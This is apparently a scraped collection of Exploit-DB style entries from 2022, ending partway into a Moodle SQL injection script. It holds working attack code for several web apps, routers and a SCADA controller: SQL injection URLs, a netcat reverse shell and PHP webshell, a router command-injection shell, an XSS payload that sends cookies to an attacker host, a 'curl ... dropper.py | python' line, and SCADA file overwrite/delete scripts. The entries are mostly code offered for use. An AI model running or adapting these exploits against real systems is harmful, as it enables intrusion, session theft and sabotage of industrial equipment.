
-
Student Record System 1.0 - 'cid' SQLi (Authenticated)
# Exploit Title: Student Record System 1.0 - 'cid' SQLi (Authenticated) # Exploit Author: Mohd. Anees # Contact: https://www.linkedin.com/in/aneessecure/ # Software Homepage: https://phpgurukul.com/student-record-system-php/ # Version : 1.0 # Tested on: windows 10 xammp | Kali linux # Category: WebApp # Google Dork: N/A # Date: 22.02.2022 ######## Description ######## # # # Authenticate and edit course section where cid parameter will appear and put your payload at there it'll work # # http://localhost/schoolmanagement/schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+ # ######## Proof of Concept ######## ========>>> REQUEST <<<========= GET /schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+ HTTP/1.1 Host: localhost sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=m1s7h9jremg0vj7ipkgf9m05n1nt Connection: close
-
WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated) # Date: 03/01/2022 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https://webhmi.com.ua/en/ # Version: WebHMI 4.1.1.7662 # Tested on: WebHMI-4.1.1.7662 #!/usr/bin/python import sys import re import argparse import requests import time import subprocess print("\nWebHMI 4.1.1 - Remote Code Execution (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n") print("Level2 account must be enabled !\n"); login = "admin" password = "admin" class Exploit: def __init__(self, target_ip, target_port, localhost, localport): self.target_ip = target_ip self.target_port = target_port self.localhost = localhost self.localport = localport def exploitation(self): reverse = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" payload = "<?php+system($_GET['c']);+?>" headers_login = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'X-WH-LOGIN': login, 'X-WH-PASSWORD': password, 'X-Requested-With': 'XMLHttpRequest', 'Connection': 'close', 'Content-Length': '0' } url = 'http://' + target_ip + ':' + target_port r = requests.Session() print('[*] Resolving URL...') r1 = r.get(url) time.sleep(3) print('[*] Trying to log in...') r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True) time.sleep(3) print('[*] Login redirection...') login_cookies = { 'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'], 'X-WH-CHECK-TRIAL':'true', 'il18next':'en', } r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies) time.sleep(3) print('[*] Bypassing basedir...') for i in range(0, len(payload)): #print(payload[i]) rp = r.get(url + 
'/setup/backup.php?sync=`echo%20-n%20"' + payload[i] + '">>cmd.php`', cookies=login_cookies) time.sleep(0.2) print('[*] Setting up listener...') listener = subprocess.Popen(["nc", "-nlp", self.localport]) time.sleep(2) print('[*] Executing payload...') time.sleep(1) print('[*] Waiting reverse shell...') r4 = r.get(url + '/setup/cmd.php?c=`' + reverse + '`.bak', cookies=login_cookies) if (r4.status_code == 200): print('[*] Got shell!') while True: listener.wait() else: print('[-] Something went wrong!') listener.terminate() def get_args(): parser = argparse.ArgumentParser(description='WebHMI 4.1.1 - Remote Code Execution (Authenticated)') parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') args = parser.parse_args() return args args = get_args() target_ip = args.url target_port = args.target_port localhost = args.localhost localport = args.localport exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation()
-
ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD
# Exploit Title: ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD # Exploit Author: LiquidWorm #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD # # # Vendor: Industrial Control Links, Inc. # Product web page: http://www.iclinks.com # Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf # Affected version: SW: 1.03.07 (build 317), WebLib: 1.24 # SW: 1.02.20 (build 286), WebLib: 1.24 # SW: 1.02.15 (build 286), WebLib: 1.22 # SW: 1.02.01 (build 229), WebLib: 1.16 # SW: 1.01.14 (build 172), WebLib: 1.14 # SW: 1.01.01 (build 2149), WebLib: 1.13 # # # Summary: Scadaflex II controllers are 100% web based # for both configuration and user interface. No applications # are required other than any standard web browser. They # are easily supported by remote access over the Internet # or a cellular link. Scadaflex II controllers support # industry standard wired communications using Modbus, # DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial # bridging for Modbus or any other protocol. Each Scadaflex # II controller has both analog and digital, inputs and # outputs, sufficient for pumping stations, irrigation # controls, and other similar process monitoring and control # applications. They can also serve as communications # concentrators and protocol converters that enhance the # operation of existing PLCs and process equipment. # # Desc: The SCADA controller is affected by unauthenticated # file write/overwrite and delete vulnerabilities. This allows # an attacker to execute critical file CRUD operations on the # device that can potentially allow system access and impact # availability. 
# # Tested on: SCADA HTTP Server # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5698 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php # # CVE ID: CVE-2022-25359 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359 # # # 06.11.2021 # import time,sys import requests import datetime import showtime # Default # AES Encryption Key = 'ABCD1234abcd:ICL' def bann(): print(''' ---------------------------------------------------------- ) ) ) ) ) ) ( ( ( ( ( ( ) ) ) ) ) ) (~~~~~~~~~) (~~~~~~~~~) | t00t | | w00t | | | | | I _._ I _._ I /' `\\ I /' `\\ I | M | I | J | f | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~| .' | ||~~~~~~~~| | .' | | |~~~~~~~~| | /'______|___||__###___|____|/'_______|____|_|__###___|___| ScadaFlex II SCADA Controllers Remote write/delete PoC ZSL-2022-5698 ---------------------------------------------------------- ''') def safe(*trigger, ): return True # |-| Safety Switch def choice(n): try: if n == 1: overwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10)) elif n == 2: delete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10)) else: print('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]') print('Usage (Delete): ./sflex.py [IP] [File position number]') raise SystemExit('t00t') except Exception as tip: raise SystemExit(tip) def jump(): choice(1) if len(sys.argv) == 4 else next choice(2) if len(sys.argv) == 3 else next def overwrite(controllerip, filepos): print('Starting script at', start) localfile = sys.argv[2] with open(localfile, 'rb') as opener: scadaurl = 'http://' scadaurl += controllerip scadaurl += '/d.php?N' scadaurl += str(filepos) scadaurl += ',73,' scadaurl += opener.name scadaurl += '~' scadaurl += str(int(time.time())) see = requests.post(scadaurl, files = {'upload' : opener}) if '100' in see.text: print('File uploaded in {} directory at position {}.'.format('l', filepos)) print('URL: 
http://' +controllerip+ '/l/' +localfile) else: print("- controller webserver error.") exit() def delete(controllerip, filepos): print('Starting script at', start) exit(42) if isinstance(filepos, str) else next scadaurl = 'http://' scadaurl += controllerip scadaurl += '/rW12IcL_Dat_N' scadaurl += str(filepos) scadaurl += ',0=1~' scadaurl += str(int(time.time())) see = requests.get(scadaurl) check = '\x72\x57' #| check += '\x31\x32' #| check += '\x49\x63' #| check += '\x4c\x5f' #| check += '\x44\x61' #| check += '\x74\x5f' #| check += '\x4e'# o' #| check += str(filepos)#| check += '\x2c\x30' #| check += '\x09\x52' #| if check in see.text: print('File at position {} deleted.'.format(filepos)) else: print('- controller webserver error.') exit() def main(): if safe(True): print('Careful...\nSafety: ON') exit(17) else: print('Safety: OFF', end = '') global start start = datetime.datetime.now() start = start.strftime('%d.%m.%Y %H:%M:%S') bann(), jump(), choice(1959) if __name__ == "__main__": main()
-
Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)
# Exploit Title: Microweber CMS v1.2.10 Local File Inclusion (Authenticated) # Date: 22.02.2022 # Exploit Author: Talha Karakumru <talhakarakumru[at]gmail.com> # Vendor Homepage: https://microweber.org/ # Software Link: https://github.com/microweber/microweber/archive/refs/tags/v1.2.10.zip # Version: Microweber CMS v1.2.10 # Tested on: Microweber CMS v1.2.10 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'Microweber CMS v1.2.10 Local File Inclusion (Authenticated)', 'Description' => %q{ Microweber CMS v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem. Upload function may delete the local file if the web service user has access. }, 'License' => MSF_LICENSE, 'Author' => [ 'Talha Karakumru <talhakarakumru[at]gmail.com>' ], 'References' => [ ['URL', 'https://huntr.dev/bounties/09218d3f-1f6a-48ae-981c-85e86ad5ed8b/'] ], 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ OS_RESOURCE_LOSS ] }, 'Targets' => [ [ 'Microweber v1.2.10', {} ] ], 'Privileged' => true, 'DisclosureDate' => '2022-01-30' ) ) register_options( [ OptString.new('TARGETURI', [true, 'The base path for Microweber', '/']), OptString.new('USERNAME', [true, 'The admin\'s username for Microweber']), OptString.new('PASSWORD', [true, 'The admin\'s password for Microweber']), OptString.new('LOCAL_FILE_PATH', [true, 'The path of the local file.']), OptBool.new('DEFANGED_MODE', [true, 'Run in defanged mode', true]) ] ) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'admin', 'login') }) if res.nil? 
fail_with(Failure::Unreachable, 'Microweber CMS cannot be reached.') end print_status 'Checking if it\'s Microweber CMS.' if res.code == 200 && !res.body.include?('Microweber') print_error 'Microweber CMS has not been detected.' Exploit::CheckCode::Safe end if res.code != 200 fail_with(Failure::Unknown, res.body) end print_good 'Microweber CMS has been detected.' return check_version(res.body) end def check_version(res_body) print_status 'Checking Microweber\'s version.' begin major, minor, build = res_body[/Version:\s+(\d+\.\d+\.\d+)/].gsub(/Version:\s+/, '').split('.') version = Rex::Version.new("#{major}.#{minor}.#{build}") rescue NoMethodError, TypeError return Exploit::CheckCode::Safe end if version == Rex::Version.new('1.2.10') print_good 'Microweber version ' + version.to_s return Exploit::CheckCode::Appears end print_error 'Microweber version ' + version.to_s if version < Rex::Version.new('1.2.10') print_warning 'The versions that are older than 1.2.10 have not been tested. You can follow the exploitation steps of the official vulnerability report.' return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe end def try_login print_status 'Trying to log in.' res = send_request_cgi({ 'method' => 'POST', 'keep_cookies' => true, 'uri' => normalize_uri(target_uri.path, 'api', 'user_login'), 'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'lang' => '', 'where_to' => 'admin_content' } }) if res.nil? fail_with(Failure::Unreachable, 'Log in request failed.') end if res.code != 200 fail_with(Failure::Unknown, res.body) end json_res = res.get_json_document if !json_res['error'].nil? && json_res['error'] == 'Wrong username or password.' fail_with(Failure::BadConfig, 'Wrong username or password.') end if !json_res['success'].nil? && json_res['success'] == 'You are logged in' print_good 'You are logged in.' 
return end fail_with(Failure::Unknown, 'An unknown error occurred.') end def try_upload print_status 'Uploading ' + datastore['LOCAL_FILE_PATH'] + ' to the backup folder.' referer = '' if !datastore['VHOST'].nil? && !datastore['VHOST'].empty? referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/" else referer = full_uri end res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'upload'), 'vars_get' => { 'src' => datastore['LOCAL_FILE_PATH'] }, 'headers' => { 'Referer' => referer } }) if res.nil? fail_with(Failure::Unreachable, 'Upload request failed.') end if res.code != 200 fail_with(Failure::Unknown, res.body) end if res.headers['Content-Type'] == 'application/json' json_res = res.get_json_document if json_res['success'] print_good json_res['success'] return end fail_with(Failure::Unknown, res.body) end fail_with(Failure::BadConfig, 'Either the file cannot be read or the file does not exist.') end def try_download filename = datastore['LOCAL_FILE_PATH'].include?('\\') ? datastore['LOCAL_FILE_PATH'].split('\\')[-1] : datastore['LOCAL_FILE_PATH'].split('/')[-1] print_status 'Downloading ' + filename + ' from the backup folder.' referer = '' if !datastore['VHOST'].nil? && !datastore['VHOST'].empty? referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/" else referer = full_uri end res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'download'), 'vars_get' => { 'filename' => filename }, 'headers' => { 'Referer' => referer } }) if res.nil? 
fail_with(Failure::Unreachable, 'Download request failed.') end if res.code != 200 fail_with(Failure::Unknown, res.body) end if res.headers['Content-Type'] == 'application/json' json_res = res.get_json_document if json_res['error'] fail_with(Failure::Unknown, json_res['error']) return end end print_status res.body end def run if datastore['DEFANGED_MODE'] warning = <<~EOF Triggering this vulnerability may delete the local file if the web service user has the permission. If you want to continue, disable the DEFANGED_MODE. => set DEFANGED_MODE false EOF fail_with(Failure::BadConfig, warning) end try_login try_upload try_download end end
-
WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)
# Exploit Title: WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated) # Date: 04/01/2022 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https://webhmi.com.ua/en/ # Version: WebHMI Firmware 4.1.1.7662 # Tested on: WebHMI Firmware 4.1.1.7662 #Steps to Reproduce 1. Login to admin account 2. Add a new register or create new dashboard insert payload <script>var i=new Image;i.src="http://ATTACKERIP/?"+document.cookie;</script> in Title field and save. # Dashboard section impact instantly all logged users. #Listener log: GET /?PHPSESSID=acaa76374df7418e81460b4a625cb457;%20i18next=en;%20X-WH-SESSION-ID=8a5d6c60bdab0704f32e792bc1d36a6f HTTP/1.1 Host: 192.168.0.169:8080 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Sec-GPC: 1 Referer: http://192.168.0.153/ Accept-Encoding: gzip, deflate Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
-
Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions
# Exploit Title: Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions # Discovery by: Luis Martinez # Discovery Date: 2022-02-23 # Vendor Homepage: https://www.wondershare.com/ # Software Link : https://download.wondershare.com/mirror_go_full8050.exe # Tested Version: 2.0.11.346 # Vulnerability Type: Local Privilege Escalation # Tested on OS: Windows 10 Pro x64 es # Step to discover Privilege Escalation: # Insecure folders permissions issue: C:\>icacls "C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\*" | findstr /i "everyone" | findstr /i ".exe" C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\adb.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\BsSndRpt.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall32.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall64.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\MirrorGo.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe.config Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\unins000.exe Everyone:(I)(F) # Service info: C:\>sc qc ElevationService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ElevationService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Driver Install Service help DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A vulnerability was found in Wondershare MirrorGo 2.0.11.346. 
The Wondershare MirrorGo executable "ElevationService.exe" is writable by Everyone (inherited Full control, as the icacls output above shows), so a local unprivileged user can replace it with a file of their choosing, which the auto-start service will then execute with "LocalSystem" privileges.
-
Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)
# Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated) # Date: 2022-03-11 # Exploit Author: Aryan Chehreghani # Vendor Homepage: http://www.seowonintech.co.kr # Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30 # Version: All version # Tested on: Windows 10 Enterprise x64 , Linux # CVE : CVE-2020-17456 # [ About - Seowon SLR-120 router ]: #The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile, #The convenience of sharing wireless internet access invigorates your lifestyle, families, #friends and workmates. Carry it around to boost your active communication anywhere. # [ Description ]: #Execute commands without authentication as admin user , #To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user. # [ Vulnerable products ]: #SLR-120S42G #SLR-120D42G #SLR-120T42G import requests print (''' ########################################################### # Seowon SLR-120S42G router - RCE (Unauthenticated) # # BY:Aryan Chehreghani # # Team:TAPESH DIGITAL SECURITY TEAM IRAN # # mail:aryanchehreghani@yahoo.com # # -+-USE:python script.py # # Example Target : http://192.168.1.1:443/ # ########################################################### ''') url = input ("=> Enter Target : ") while(True): try: cmd = input ("~Enter Command $ ") header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", "Accept": "*/*", "Accept-Language": "en-US,en;q:0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "207", "Origin": "http://192.168.1.1", "Connection": "close", "Referer": "http://192.168.1.1/", "Upgrade-Insecure-Requests": "1" } datas = { 'Command':'Diagnostic', 'traceMode':'ping', 'reportIpOnly':'', 'pingIpAddr':';'+cmd, 'pingPktSize':'56', 'pingTimeout':'30', 
'pingCount':'4', 'maxTTLCnt':'30', 'queriesCnt':'3', 'reportIpOnlyCheckbox':'on', 'logarea':'com.cgi', 'btnApply':'Apply', 'T':'1646950471018' } x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas) print(x.text) except: break
-
WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path
# Exploit Title: WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path # Exploit Author: Antonio Cuomo (arkantolo) # Exploit Date: 2022-03-09 # Vendor : ilwebmaster21 # Version : WOW21_Service 5.0.1.9 # Vendor Homepage : https://wow21.life/ # Tested on OS: Windows 10 Pro x64 #PoC : ============== C:\>sc qc WOW21_Service [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: WOW21_Service TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\WOW21\WOW21_Service.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : WOW21_Service DIPENDENZE : SERVICE_START_NAME : LocalSystem
-
Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path
# Exploit Title: Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path # Exploit Author: Antonio Cuomo (arkantolo) # Exploit Date: 2022-03-09 # Vendor : David Xanatos # Version : SbieSvc 5.50.2 # Vendor Homepage : https://sandboxie-plus.com/ # Tested on OS: Windows 10 Pro x64 #PoC : ============== C:\>sc qc SbieSvc [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: SbieSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\Sandboxie-Plus\SbieSvc.exe GRUPPO_ORDINE_CARICAMENTO : UIGroup TAG : 0 NOME_VISUALIZZATO : Sandboxie Service DIPENDENZE : SERVICE_START_NAME : LocalSystem
-
Tdarr 2.00.15 - Command Injection
# Exploit Title: Tdarr 2.00.15 - Command Injection # Date: 10/03/2022 # Exploit Author: Sam Smith # Vendor Homepage: https://tdarr.io # Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip # Version: 2.00.15 (likely also older versions) # Tested on: 2.00.15 Exploit: The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell. eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`. Tdarr is not protected by any auth by default and no credentials are required to trigger RCE
-
Baixar GLPI Project 9.4.6 - SQLi
# Exploit Title: Baixar GLPI Project 9.4.6 - SQLi # Date: 10/12 # Exploit Author: Joas Antonio # Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/ # Software Link: https://glpi-project.org/pt-br/baixar/ # Version: GLPI - 9.4.6 # Tested on: Windows/Linux # CVE : CVE-2021-44617 #POC1: plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111 sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1"
-
Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated) # Date: 13.03.2022 # Exploit Author: Ashish Koli (Shikari) # Vendor Homepage: https://github.com/pluck-cms/pluck # Version: 4.7.16 # Tested on Ubuntu 20.04.3 LTS # CVE: CVE-2022-26965 # Usage : python3 exploit.py <IP> <Port> <Password> <Pluckcmspath> # Example: python3 exploit.py 127.0.0.1 80 admin /pluck # Reference: https://github.com/shikari00007/Pluck-CMS-Pluck-4.7.16-Theme-Upload-Remote-Code-Execution-Authenticated--POC ''' Description: A theme upload functinality in Pluck CMS before 4.7.16 allows an admin privileged user to gain access in the host through the "themes files", which may result in remote code execution. ''' ''' Import required modules: ''' import sys import requests import json import time import urllib.parse import struct ''' User Input: ''' target_ip = sys.argv[1] target_port = sys.argv[2] password = sys.argv[3] pluckcmspath = sys.argv[4] ''' Get cookie ''' session = requests.Session() link = 'http://' + target_ip + ':' + target_port + pluckcmspath response = session.get(link) cookies_session = session.cookies.get_dict() cookie = json.dumps(cookies_session) cookie = cookie.replace('"}','') cookie = cookie.replace('{"', '') cookie = cookie.replace('"', '') cookie = cookie.replace(" ", '') cookie = cookie.replace(":", '=') ''' Authentication: ''' # Compute Content-Length: base_content_len = 27 password_encoded = urllib.parse.quote(password, safe='') password_encoded_len = len(password_encoded.encode('utf-8')) content_len = base_content_len + password_encoded_len # Construct Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': str(content_len), 'Origin': 
'http://' + target_ip, 'Connection': 'close', 'Referer': 'http://' + target_ip + pluckcmspath + '/login.php', 'Cookie': cookie, 'Upgrade-Insecure-Requests': '1' } # Construct Data: body = { 'cont1': password, 'bogus': '', 'submit': 'Log in', } # Authenticating: link_auth = 'http://' + target_ip + ':' + target_port + pluckcmspath + '/login.php' auth = requests.post(link_auth, headers=header, data=body) print('') if 'error' in auth.text: print('Password incorrect, please try again:') exit() else: print('Authentification was succesfull, uploading webshell') print('') ''' Upload Webshell: ''' # Construct Header: header1 = { 'Host': target_ip, 'Cache-Control': 'max-age=0', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="90"', 'sec-ch-ua-mobile': '?0', 'Origin': 'http://' + target_ip, 'Upgrade-Insecure-Requests': '1', 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'document', 'Referer': 'http://' + target_ip + ':' + target_port + pluckcmspath + '/admin.php?action=themeinstall', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9', 'Cookie': cookie, 'Connection': 'close', } # loading Webshell payload: path = 'shell.tar' fp = open(path,'rb') data= fp.read() # Uploading Webshell: link_upload = 'http://' + target_ip + ':' + target_port + pluckcmspath + '/admin.php?action=themeinstall' upload = requests.post(link_upload, headers=header1, data=data) ''' Finish: ''' print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + pluckcmspath + '/data/themes/shell/shell.php') print('')
-
VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path
# Exploit Title: VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path # Date: 11/03/2022 # Exploit Author: Faisal Alasmari # Vendor Homepage: https://www.vive.com/ # Software Link: https://developer.vive.com/resources/downloads/ # Version: 1.0.0.4 # Tested: Windows 10 x64 C:\Users\User>sc qc "VIVE Runtime Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VIVE Runtime Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\VIVE\Updater\App\ViveRuntimeService\ViveAgentService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VIVE Runtime Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
-
Moodle 3.11.5 - SQLi (Authenticated)
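#!/usr/bin/env python
# Exploit Title: Moodle 3.11.5 - SQLi (Authenticated)
# Date: 2/3/2022
# Exploit Author: Chris Anastasio (@mufinnnnnnn)
# Vendor Homepage: https://moodle.com/
# Software Link: https://github.com/moodle/moodle/archive/refs/tags/v3.11.5.zip
# Write Up: https://muffsec.com/blog/moodle-2nd-order-sqli/
# Tested on: Moodle 3.11.5+
"""
sqlmap tamper script driving a 2nd-order SQL injection in Moodle's badge criteria.

thanks to:
- https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/
- https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap
- Miroslav Stampar for maintaining this incredible tool

greetz to:
- @steventseeley
- @fabiusartrel
- @mpeg4codec
- @0x90shell
- @jkbenaim
- jmp
"""
import sys
import requests
import re
from pprint import pprint
from collections import OrderedDict
from lib.core.enums import PRIORITY
from lib.core.data import conf
from lib.core.data import kb
from random import sample

__priority__ = PRIORITY.NORMAL

# every request below is sent with verify=False; silence the per-request warning
requests.packages.urllib3.disable_warnings()

"""
Moodle 2.7dev (Build: 20131129) to 3.11.5+ 2nd Order SQLi Exploit by muffin (@mufinnnnnnn)

How to use:

1. Define the variables at the top of this file (USERNAME, PASSWORD, APP_ROOT, COURSE_ID), example:

    USERNAME = "teacher's-username"
    PASSWORD = "teacher's-password"
    APP_ROOT = "http://127.0.0.1/moodle"
    COURSE_ID = 3

    NOTE: the course id should be a course that your teacher can create badges on

2. Create a file called `req.txt` that looks like the following. Be sure to update the `Host:` field...

POST /moodle/badges/criteria_settings.php?badgeid=badge-id-replace-me&add=1&type=6 HTTP/1.1
Host: <your-target-here>
Content-Type: application/x-www-form-urlencoded
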